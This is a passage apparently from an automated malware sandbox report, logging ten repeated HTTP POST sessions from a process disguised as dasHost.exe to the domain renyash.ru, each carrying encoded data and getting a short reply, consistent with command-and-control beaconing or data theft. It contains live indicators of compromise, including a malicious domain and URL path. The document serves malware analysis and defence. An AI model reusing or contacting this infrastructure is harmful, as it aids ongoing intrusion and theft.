                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3883&min_rtt=1964&rtt_var=4574&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=84310&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        21192.168.2.449789104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:43:16.904313087 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:17.251120090 CET2584OUTData Raw: 56 52 5c 55 56 41 55 5e 5d 5f 52 56 5a 5c 58 5e 57 5e 5f 5f 54 53 55 43 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VR\UVAU^]_RVZ\X^W^__TSUCR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX'+,-\6' (Y-+ =*=")7T)?3.*+[" ]*,%\ ![(7
                                                                        Dec 28, 2024 20:43:18.081552029 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:18.333076000 CET801INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:18 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FxVGpcd7WFHpKQEDiHhAJKKgSHXaekhsXV02tAmHMujjUOu8NTBFnoDOqxsRR9ugBkPa61H8p7vmOIANw5etzGrZbGJ6XEfDyaJhBrvWpYbPkv%2FxGhckBmDxGgp3HT8754uWjWzq"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409d90c11437f-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3413&min_rtt=1675&rtt_var=4104&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=93715&cwnd=78&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        22192.168.2.449795104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:43:18.628122091 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:18.985600948 CET2584OUTData Raw: 56 54 5c 56 56 47 55 5e 5d 5f 52 56 5a 50 58 58 57 5e 5f 5e 54 56 55 49 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VT\VVGU^]_RVZPXXW^_^TVUIR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX'+/:" 6#,+?7.*3Q79(=?^9)\!0)%\ ![(
                                                                        Dec 28, 2024 20:43:19.796606064 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:20.039907932 CET815INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:19 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y%2BX8HhntjMow1T5TOsZXtS3C%2FNA2xjvz4cJyLTb%2FUjGm2izLanQW%2BL75XyBuc2cDVI4I2f3oUqt8cw%2BTdBMsp%2BhORY1gRPN13gAiXidWTsTduK73TTSuneqWNGVHSN5u%2F%2BPW59Kq"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409e3cf0c8c47-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=8856&min_rtt=1981&rtt_var=14493&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=25621&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        23192.168.2.449796104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:43:20.611946106 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:20.969981909 CET2584OUTData Raw: 56 51 59 51 56 40 55 5f 5d 5f 52 56 5a 5f 58 54 57 51 5f 5a 54 5d 55 43 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VQYQV@U_]_RVZ_XTWQ_ZT]UCR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$_)<:6'4,?X!>&X=$ */V>?,)+50]=<%\ ![(
                                                                        Dec 28, 2024 20:43:21.789408922 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:22.041160107 CET808INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:21 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=im1%2F%2BXFwyJjeSg9bpbhd%2BbamwiYWcxiRFJ5HJHKrxnJY37UBwXLvNDJQ2aW9cl5wbgkoUQmcD1mFtkFuwk3KggSaYhwmb4Sri1wSAeAAuJ%2BCbbVR7PMW2p8cBGUiQVeUytXP%2B5RG"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409f02aef4398-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4756&min_rtt=1658&rtt_var=6818&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=55208&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        24192.168.2.449802104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:43:22.275301933 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:22.626125097 CET2584OUTData Raw: 56 53 59 57 53 41 50 5f 5d 5f 52 56 5a 5d 58 5e 57 5f 5f 5e 54 54 55 43 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VSYWSAP_]_RVZ]X^W__^TTUCR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$() ;+ ,/+7Z#.)>/ ),><.]5V$=%\ ![(3
                                                                        Dec 28, 2024 20:43:23.359200001 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:23.608197927 CET821INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:23 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xs4hgF%2BX%2BxZOGG%2BnCQ4U%2BQdmyFLuzs9Mi%2FIa5H%2F%2F%2BCNA%2FQ18vx9zi28TqTrmxXrQbQdZe97bP%2Fx7y0RlY%2FRwGvK8Iv1rcN5lGAM00OSpOuH%2FS4PV%2BbOhk%2FQH1XI7Bv0ZRlB0LuQn"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9409fa0a87f78f-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4513&min_rtt=1545&rtt_var=6517&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=57716&cwnd=136&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a
                                                                        Data Ascii: 42RZZ
                                                                        Dec 28, 2024 20:43:23.799776077 CET5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        25192.168.2.449808104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:43:24.052297115 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2576
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:24.407542944 CET2576OUTData Raw: 56 55 59 50 56 44 55 5b 5d 5f 52 56 5a 58 58 5c 57 50 5f 50 54 56 55 45 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VUYPVDU[]_RVZXX\WP_PTVUER]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$^)<>"?7([8/[ =&\+-8 #U*,*#!33(,%\ ![(
                                                                        Dec 28, 2024 20:43:25.190083027 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:25.535326004 CET799INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:25 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uJd28vXYgtM6q7KgbMLJ91QFINq0zFeox0BZjqnUIdCGIGBLzrbwhRelDUGrXzqmuRhm3hOJ8gdVKIp4LVVtUpQO3HqD85UA9CQcO2yCbV9y2eCDZb1ak41CeXyXlzHdf7%2BkgFrz"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a056e0f4285-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4689&min_rtt=2128&rtt_var=5920&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2882&delivery_rate=64556&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        26192.168.2.449814104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:43:25.806969881 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:26.157352924 CET2584OUTData Raw: 56 5b 59 53 56 44 55 5c 5d 5f 52 56 5a 50 58 5e 57 5d 5f 51 54 50 55 41 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: V[YSVDU\]_RVZPX^W]_QTPUAR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$Z<,9"; ^ <X/[ ))=(#9?U)(:9(5V;[(,%\ ![(
                                                                        Dec 28, 2024 20:43:26.938030005 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:27.180099964 CET806INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:26 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zgGm3xK8Z6SFKl%2FYaJPYskwZNZRzj2yB1W6EUG0w2SgNRxUd%2F0GKuT%2FCeCPbWMALJVgkcuFov2Qo6dMYt5x48QGAmTrnGnJYMCQ1u3ByOWE3aVKCsWb%2Fm0fYaRJShiI5QLsnJnDK"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a10696d18b4-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4363&min_rtt=1458&rtt_var=6356&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=59114&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        27192.168.2.449815104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:43:27.438606977 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:27.798027992 CET2584OUTData Raw: 56 51 59 5f 56 46 50 5d 5d 5f 52 56 5a 59 58 55 57 59 5f 58 54 5d 55 49 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VQY_VFP]]_RVZYXUWY_XT]UIR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$?Z%"+,4$/, .\= 7)(*0:9$5,>%\ ![(#
                                                                        Dec 28, 2024 20:43:28.739203930 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:28.765451908 CET806INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:28 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MgXqnTcWH8yW9anG4IyOOj8g%2BlRKUYt8i3bUmJgAIjo8ZW5iM7fohi9W516SUg35V%2FtAm4vGUBmwt7DLyr%2FfBwqvjA9d%2BEd4oH4QKs5gp6HnLH9VsER2NlcQBo918p6THlqsbrCx"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a1a5b388cb4-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3759&min_rtt=1913&rtt_var=4411&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=87493&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        28192.168.2.449820104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:43:29.235821009 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:29.594844103 CET2584OUTData Raw: 56 5b 59 51 56 48 55 5f 5d 5f 52 56 5a 5d 58 59 57 5d 5f 5a 54 52 55 48 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: V[YQVHU_]_RVZ]XYW]_ZTRUHR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX'+: +4#58;;'[!.**$ *7U)(:5<*%\ ![(3
                                                                        Dec 28, 2024 20:43:30.366914988 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:30.617439032 CET806INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:30 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cxIP3emVq3MFn66dnbVy1GT6cZA%2FxE3Q32zG%2Bz8IWrZ73YnH12XWno5O33SOqHUwXRh0phGnG6d3ecxJpTxhJERHohdsFmoZL1qG5%2BuxYSnEtrbfijzJvzRiiEp%2FytHQsl6etfRi"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a25dd8ede94-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3498&min_rtt=1450&rtt_var=4640&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=81861&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        29192.168.2.449822104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:43:30.879215956 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2580
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:31.235578060 CET2580OUTData Raw: 56 55 5c 51 56 45 55 58 5d 5f 52 56 5a 58 58 5a 57 5e 5f 5b 54 53 55 44 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VU\QVEUX]_RVZXXZW^_[TSUDR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX'?<=] +#<Y/+7[4.).$ 97><-946 ?><%\ ![(?
                                                                        Dec 28, 2024 20:43:32.057957888 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:32.313186884 CET812INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:32 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZJzJLrE%2FTVFOUSov8M6MSI12Js%2BGUlF28mVuMJVprdVYgTbKYrJVk%2FJ%2B%2FoSPkB7W6zji6SVyyRnPetm%2FQn%2B8YedJ0FlWRrCTRW8LBlKhZWCaiamyjkWM8qjstFO8nyJo5jeWPN0b"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a305e245e7d-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4463&min_rtt=1670&rtt_var=6213&sent=4&recv=8&lost=0&retrans=0&sent_bytes=25&recv_bytes=2886&delivery_rate=60790&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        30192.168.2.449828104.21.38.84808628C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 28, 2024 20:43:32.733181000 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:33.079530954 CET2584OUTData Raw: 53 55 59 52 53 41 55 5b 5d 5f 52 56 5a 5c 58 5d 57 5f 5f 5e 54 50 55 44 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SUYRSAU[]_RVZ\X]W__^TPUDR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$Z)?-]6 %,+#.:*;#=?;^-_75+[=%\ ![(7
                                                                        Dec 28, 2024 20:43:33.819001913 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:34.058556080 CET804INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:33 GMT
